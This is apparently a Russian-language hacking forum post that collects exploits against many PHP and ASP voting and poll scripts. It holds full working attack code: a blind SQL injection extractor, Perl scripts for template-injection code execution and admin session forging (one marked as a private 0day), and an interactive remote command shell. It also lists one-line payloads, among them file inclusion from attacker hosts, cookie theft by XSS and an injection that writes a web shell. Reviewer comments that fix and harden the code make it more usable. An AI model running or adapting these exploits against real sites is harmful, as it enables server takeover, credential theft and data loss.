
[..::Уязвимости скриптов голосования::..]
Post [..::Уязвимости скриптов голосования::..]

Nabopoll 1.2


Vendor: www.nabocorp.com/nabopoll/

Blind SQL Injection

Exploit:

PHP код:
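<?php
# Nabopoll Blind SQL Injection PoC Exploit
# Download: www.nabocorp.com/nabopoll/
# coded by s0cratex
# Contact: s0cratex@hotmail.com
#
# Boolean-based blind injection through result.php?surv=.  Every request asks
# "is byte $j of MySQL's user() equal to $x?" and treats the presence of the
# string "power" in the response as a "yes" (the original PoC's oracle; verify
# it against the target's normal page before trusting the output).
# Only run this against systems you are authorised to test.
#
# Fixes over the forum listing: the `=`/`;` the board's highlighter dropped
# are restored, `break` now leaves the byte scan (it only left the response
# read loop, so every byte cost 255 requests and a miss looped forever),
# the removed ereg() is replaced, a Host header is sent, and a failed
# connection is reported instead of being silently ignored.

error_reporting(0);
ini_set("max_execution_time", 0);

// just change the default values...
$srv = "localhost"; $path = "/poll"; $port = 80;
$survey = "8"; // id of an existing survey; check it on the site's results page

/**
 * Send one GET for $path$query to $srv:$port and report whether the
 * response contains the "true" marker of the injected condition.
 *
 * @param string $srv   target host
 * @param int    $port  target port
 * @param string $path  application base path, e.g. "/poll"
 * @param string $query script plus query string appended to $path
 * @return bool|null true/false for the oracle answer, null if the connect failed
 */
function nabopoll_oracle($srv, $port, $path, $query)
{
    $cnx = fsockopen($srv, $port);
    if ($cnx === false) {
        return null;
    }
    // HTTP/1.0 with an explicit Host header so name-based virtual hosts answer
    fwrite($cnx, "GET " . $path . $query . " HTTP/1.0\r\nHost: " . $srv . "\r\n\r\n");
    $hit = false;
    while (!feof($cnx)) {
        // assumption inherited from the original PoC: the page only renders its
        // "power..." text when the injected IF() evaluates to 1
        if (strpos(fgets($cnx), "power") !== false) {
            $hit = true;
            break;
        }
    }
    fclose($cnx);
    return $hit;
}

echo "==================================================\n";
echo "Nabopoll SQL Injection -- Proof of Concept Exploit\n";
echo "--------------------------------------------------\n\n";
echo " -- MySQL User: ";
$j = 1; $user = "";
// SUBSTRING() past the end of user() yields '' whose ASCII() is 0, so a
// confirmed chr(0) marks the end of the string and terminates the scan.
while (!strstr($user, chr(0))) {
    $found = false;
    for ($x = 0; $x <= 255; $x++) {
        $xpl = "/result.php?surv=" . $survey . "/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user()," . $j . ",1))=" . $x . "),1,0)))/*";
        $answer = nabopoll_oracle($srv, $port, $path, $xpl);
        if ($answer === null) {
            die("\n Connection to " . $srv . ":" . $port . " failed");
        }
        if ($answer) {
            $user .= chr($x);
            if ($x) {
                echo chr($x); // do not write a raw NUL to the terminal
            }
            $found = true;
            break; // byte identified: stop scanning the remaining candidates
        }
    }
    // no candidate matched: the oracle is unreliable or the target is patched
    if (!$found) {
        die("\n Try again...");
    }
    $j++;
}
echo "\n";
?>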
RFI

PoC:

Код:
http://www.site.com/[path]/survey.inc.php?path=http://shell.txt?
Admin without password

Код:
http://target/nabopoll/admin/config_edit.php
http://target/nabopoll/admin/template_edit.php
http://target/nabopoll/admin/survey_edit.php
*Доступ к этим файлам может получить любой пользователь, без пароля

***

PollMentor v2.0

Vendor: http://www.aspindir.com/indir.asp?id=4406

PoC:

Код:
http://[site]/[script-path]/pollmentorres.asp?id=-1+UPDATE+poll+SET+question='HekId';--
***

Advanced Poll <= 2.0.5


Vulnerable: Advanced Poll 2.0.0 – 2.0.5

Remote Code Execution

Exploit:

Код:
#!/usr/bin/perl -w
# Advanced Poll 2.0.0 >= 2.0.5-dev textfile RCE.
#
# date: 30/07/06
# 
# diwou <diwou@phucksys.org>
#
# PHCKSEC (c) 2001-2006.
#
# Hey, what a mad world!
#

use strict;
use warnings;
use LWP::UserAgent;
use MD5;

#
# args: http://url/apoll_path cmd
#
# proxy: export PROXY='http|https://www.my.big.and.famous.proxy:8080/'
# url: http|https://target:(port)/phppoll/
#

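die("RTFC! ;)") unless(@ARGV>1);

# args: http://url/apoll_path cmd   (see the header comment)
my ($url, $cmd) = @ARGV[0, 1];
my ($lwp, $agent, $out);

# Posted to admin_templates.php to overwrite the display_head.html template.
# Its first line closes the template's double-quoted context and, when
# admin_preview.php later renders the template, apparently runs the value of
# the "PHP" request header (getenv(HTTP_PHP)).  The rest is the stock markup
# so the preview still renders.  Interpolating heredoc: "\\" -> "\", "\$" -> "$".
# NOTE(review): HTTP_PHP is a bareword constant; on PHP 8 that is a fatal
# error rather than a notice, so the payload only works on older PHP.
my %ipost=
(
	poll_tplset => 'default',
	'tpl[display_head.html]' =>
<<HEAD
\\".system(getenv(HTTP_PHP)).exit().\\"
<table width="\$pollvars[table_width]" border="0" cellspacing="0" cellpadding="1" bgcolor="\$pollvars[bgcolor_fr]">
  <tr align="center">
    <td><style type="text/css">
       <!--
        .input { font-family: \$pollvars[font_face]; font-size: 8pt}
        .links { font-family: \$pollvars[font_face]; font-size: 7.5pt; color: \$pollvars[font_color]}
       -->
      </style><font face="\$pollvars[font_face]" size="-1" color="#FFFFFF"><b>\$pollvars[title]</b></font></td>
  </tr>
  <tr align="center">
    <td>
      <table width="100%" border="0" cellspacing="0" cellpadding="2" align="center" bgcolor="\$pollvars[bgcolor_tab]">
        <tr>
          <td height="40" valign="middle"><font face="\$pollvars[font_face]" color="\$pollvars[font_color]" size="1"><b>\$question</b></font></td>
        </tr>
        <tr align="right" valign="top">
          <td>
            <form method="post" action="\$this->form_forward">
            <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">
              <tr valign="top" align="center">
                <td>
                  <table width="100%" border="0" cellspacing="0" cellpadding="1" align="center">
HEAD
,
	action   =>  '',
	tplset   =>  'default',
	tpl_type =>  'display',
	session  =>  '',
	uid      =>  1
);

# Posted to admin_preview.php to render the tampered template.
# NOTE(review): this key is 'poll_tplst' while %ipost uses 'poll_tplset';
# left untouched because the listing does not show which name the target reads.
my %epost=
(
	session    => '',
	uid        => 1,
	poll_tplst => 'default',
	tpl_type   => 'display',
);

# Login form fields for admin/index.php.  The credentials are made up; the
# response apparently still carries a usable 32-character session token.
# The hashed copy the form expects is filled in below.
my %zday=
(
	username => 'jakahw4nk4h',
	'pollvars[poll_username]' => 'jakahw4nk4h',
	password => 'fuckoff',
	'pollvars[poll_password]' => ''
);

$zday{'pollvars[poll_password]'}=md5($zday{password});
# NOTE(review): the original comment claimed a POST's User-Agent is not
# logged.  It is (Apache's combined log format records it for every method),
# so this banner is visible to the target's administrators; the browser-like
# line below is the inconspicuous alternative.
$agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D";
#$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1";

$lwp = LWP::UserAgent->new();
$lwp->agent($agent);
$lwp->timeout(10);
$lwp->protocols_allowed(['http','https']);

if($ENV{PROXY})
{
	$lwp->proxy(['http','https'],$ENV{PROXY});
	print "Using proxy ".$ENV{PROXY}."\n";
}

$url.="/" if($url!~/\/$/);
$url.="admin/index.php";
print "Doing some pretty with ".$url."...\n\n";

# Step 1: obtain a session.  A non-2xx reply is reported rather than silently
# parsed (the original parsed LWP's own error page as if it were the app).
print "+ generating session...\n";
my $resp = $lwp->post($url,\%zday);
warn "  HTTP ".$resp->status_line."\n" unless $resp->is_success;
$out = $resp->content();
if($out=~ /index\.php\?session=((.){32})/)
{
	my $session = $1;   # the 32-character token; $1 is not reused after this
	$ipost{'session'}=$epost{'session'}=$session;
	print "  session: ".$session."\n";

	# Step 2: store the tampered template.
	$url=~s/index\.php/admin_templates\.php/g;
	print "+ injecting diplay_head.html template...\n";
	$resp = $lwp->post($url,\%ipost);
	warn "  HTTP ".$resp->status_line."\n" unless $resp->is_success;
	$out = $resp->content();
	# Non-greedy attribute match: the original "(.*)" swallowed everything up
	# to the last class="button" on the line when several buttons share it.
	$epost{'action'}=$1 if($out=~ /<input type="submit" name="action" value="([^"]*)" class="button">/);
	print "  button: ".(defined $epost{'action'} ? $epost{'action'} : '')."\n";

	# Step 3: render it.  The command rides in a custom "PHP:" request header,
	# which the web server exposes to the template as HTTP_PHP; the BOCE/EOCE
	# echoes bracket its output in the page.
	$url=~s/admin_templates\.php/admin_preview\.php/g;
	print "+ executing...\n";
	$resp = $lwp->post($url,\%epost,PHP => "echo BOCE;".$cmd.";echo EOCE");
	warn "  HTTP ".$resp->status_line."\n" unless $resp->is_success;
	$out = $resp->content();

	print "-- BOCE --\n";
	my $inside = 0;
	for my $line (split /\n/, $out)
	{
		if ($line =~ /BOCE/) { $inside = 1; next; }
		if ($line =~ /EOCE/) { $inside = 0; next; }
		print $line."\n" if $inside;
	}
	print "-- EOCE --\n";
}
else
{
	print "don't worry, u can improve me! eh eh eh :D?\n";
}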

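# Hex MD5 digest of the concatenated arguments (what the login form expects
# in pollvars[poll_password]).  Uses core Digest::MD5 instead of the
# long-unmaintained CPAN "MD5" module the listing requires at the top; the
# `use MD5;` line can be dropped once this is in place.  The original also
# clobbered the global $_ with the digest object.
sub md5
{
	my @data = @_;
	require Digest::MD5;
	return Digest::MD5::md5_hex(@data);
}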
Remote Admin Session Generator

Exploit:

Код:
#!/usr/bin/perl -w
# Advanced Poll 2.0.0 >= 2.0.5-dev textfile admin session gen.
#
# 
# 0day!  KEEP IT PRIVATE  0day!
# 
# date: 30/07/06
# 
# diwou <diwou@phucksys.org>
#
# PHCKSEC (c) 2001-2006.
#
# see templates for code execution ;).

use strict;
use warnings;
use LWP::UserAgent;
use MD5;

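# args: url proxy(optional)
#
# url: http|https://target:(port)/phppoll/
# proxy: http|https://hostname:(port)/
die("RTFC! ;)") unless(@ARGV);

my ($url, $proxy) = @ARGV[0, 1];
my ($lwp, $agent, $out);

# Login form fields for admin/index.php.  The credentials are made up; the
# response apparently still carries a usable 32-character session token.
# The hashed copy the form expects is filled in below.
my %zday=
(
	username => 'jakahw4nk4h',
	'pollvars[poll_username]' => 'jakahw4nk4h',
	password => 'fuckoff',
	'pollvars[poll_password]' => ''
);
$zday{'pollvars[poll_password]'}=md5($zday{password});

# NOTE(review): the original comment claimed a POST's User-Agent is not
# logged.  It is (Apache's combined log format records it for every method),
# so this banner is visible to the target's administrators; the browser-like
# line below is the inconspicuous alternative.
$agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D";
#$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1";

# some lwp routines...
$lwp = LWP::UserAgent->new();
$lwp->agent($agent);
$lwp->timeout(10);
$lwp->protocols_allowed(['http','https']);
$lwp->proxy(['http','https'],$proxy) if(@ARGV>1);

$url.="/" if($url!~/\/$/);
$url.="admin/index.php";
print "Using proxy ".$proxy."\n" if($proxy);
print "Doing some pretty with ".$url."...\n\n";

# A non-2xx reply is reported rather than silently parsed (the original
# scanned LWP's own error page for a session link).
my $resp = $lwp->post($url,\%zday);
warn "  HTTP ".$resp->status_line."\n" unless $resp->is_success;
$out = $resp->content();
if($out=~ /index\.php\?session=((.){32})/)
{
	my $session = $1;   # the 32-character token; $1 is not reused after this
	print "well, you are a bigone ;).\n";
	print "try: ".$url."?session=".$session."&uid=1\n";
}
else
{
	print "don't worry, u can improve me! eh eh eh :D?\n";
}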

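# Hex MD5 digest of the concatenated arguments (what the login form expects
# in pollvars[poll_password]).  Uses core Digest::MD5 instead of the
# long-unmaintained CPAN "MD5" module the listing requires at the top; the
# `use MD5;` line can be dropped once this is in place.  The original also
# clobbered the global $_ with the digest object.
sub md5
{
	my @data = @_;
	require Digest::MD5;
	return Digest::MD5::md5_hex(@data);
}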
RFI

Vulnerable: Advanced Poll 2.0.2

PoC:

Код:
http://www.example.com/[path_advanced_poll]/admin/common.inc.php?base_path=http://www.example.com/
***

Flipper Poll v1.1.0


Vendor: http://sourceforge.net/project/showfiles.php?group_id=59828

RFI

PoC:

Код:
/poll.php?root_path=evilscripts?
***

Vote-Pro 4.0


Vendor: http://www.vote-pro.com/

Remote Code Execution

Exploit:

Код:
use IO::Socket;

# Fixed HTTP port; target host and web path of the poll come from the
# command line (the two shifts consume $ARGV[0] and $ARGV[1]).
$port = "80";
($target, $folder) = (shift, shift);   # e.g. vote-pro.com  /votepro/

# Print the two-line banner shown once at startup.
sub Header()
{
	my $banner = "Vote-Pro Code Injection Exploit - writ3r [at] gmail.com\n"
	           . "-------------------------------------------------------\n";
	print $banner;
}

# Print the command-line synopsis and terminate the script.
sub Usage()
{
	my $text = "\n"
	         . "Usage: votecmd.pl [target] [directory]\n"
	         . "Example: votecmd.pl vote-pro.com /votepro/\n";
	print $text;
	exit();
}

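Header();

if (!$target || !$folder) {
	Usage(); }

# Interactive command loop through the poll_id injection in poll_frame.php:
# each command is sent as the "com" query parameter and the injected
# system($_GET[com]) runs it on the target.  Only use against systems you are
# authorised to test.
#
# Fixes over the forum listing: the reply was never read (command output was
# lost and a keep-alive socket leaked per iteration); substr($cmd,0,-1) cut
# the last character of the initial "dir" (sending "di") instead of just the
# newline; only spaces were percent-encoded; "$_GET[com]" inside a
# double-quoted Perl string is at the mercy of Perl's subscript-interpolation
# heuristic, so it is now escaped.
print "[+] Connecting...\n";
$cmd = "dir";
while ($cmd !~ /exit/)
{
	chomp $cmd;
	# Encode everything outside the RFC 3986 unreserved set so shell
	# metacharacters survive the query string intact.
	(my $encoded = $cmd) =~ s/([^A-Za-z0-9_.~-])/sprintf("%%%02X", ord($1))/ge;

	$xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...\r\n";
	print $xpack "GET ".$folder."poll_frame.php?poll_id=hyphy;system(\$_GET[com]);&com=".$encoded."; HTTP/1.1\r\n";
	print $xpack "Host: $target\r\n";
	print $xpack "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\r\n";
	print $xpack "Accept: text/html\r\n";
	# "close" so the read loop below ends at EOF instead of waiting on a
	# keep-alive connection the server never closes.
	print $xpack "Connection: close\r\n\r\n";

	# Skip the response headers, print the body (the command output).
	my $in_body = 0;
	while (my $line = <$xpack>) {
		if (!$in_body) {
			$in_body = 1 if $line =~ /^\r?\n$/;
			next;
		}
		print $line;
	}
	close $xpack;

	print "[cmd]\$ ";
	$cmd = <STDIN>;
	last unless defined $cmd;   # EOF on stdin: leave instead of spinning
}

print "[!] Connection to host lost...\n";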
***

LunarPoll 1.0


Vendor: http://dexxaboy.com/scripts/lunarpoll/download/

RFI

PoC:

Код:
show.php?PollDir=http://attacker.txt?
***

cwmVote 1.0


Vendor: http://explorer.cwm-design.de/dirs/41/cwmVote.rar

RFI

PoC:

Код:
http://[target]/[cwm_vote_path]/archive.php?abs=http://[Shellscript]
***

Absolute Poll Manager


Vendor: http://www.xigla.com/absolutepm/

XSS

Vulnerable: XIGLA SOFTWARE Absolute Poll Manager XE 4.1

PoC:

Код:
http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>alert("running+code+within+the+context+of+"%2bdocument.domain)</script>

http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>location="http://www.example2.com/?"%2bdocument.cookie</script>

http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=%3cscript%3elocation=%22http%3a//www.%65xample%2ecom/?%22%2bdocument.cookie%3c/script%3e&
***

PHPCentral Poll Script


Vendor: http://www.phpcentral.org/scripts.php

Remote Command Execution

Vulnerable: PHPCentral Poll Script v1.0

PoC:

Код:
http://www.example.com/poll.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?&cmd=id

http://www.example.com/pollarchive.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?&cmd=id
***

X-Scripts X-Poll


SQL Injection

PoC:

Код:
http://www.example.com/poll/top.php?poll=' AND 0 UNION SELECT 0, '%3C%3Fsystem%28%24_GET%5B%22c%22%5D%29%3B%3F%3E' , 1, 2, 3, 4, 5, 6, 7, 8,'' INTO OUTFILE '/usr/webserver/public_htm/rshell.php'
***

Comdev Vote Caster


Vendor: http://www.comdevweb.com/votecaster.php

SQL Injection

Vulnerable: Comdev VoteCaster 3.1

PoC:

Код:
http://www.example.com/index.php?pageaction=results&campaign_id=[SQL]
***

AzDGVote


RFI

PoC:

Код:
http://www.example.com/poll/view.php?int_path=http://attacker
http://www.example.com/ordinaopenpodcast/script/poll/view.php?int_path=http://attacker
***
 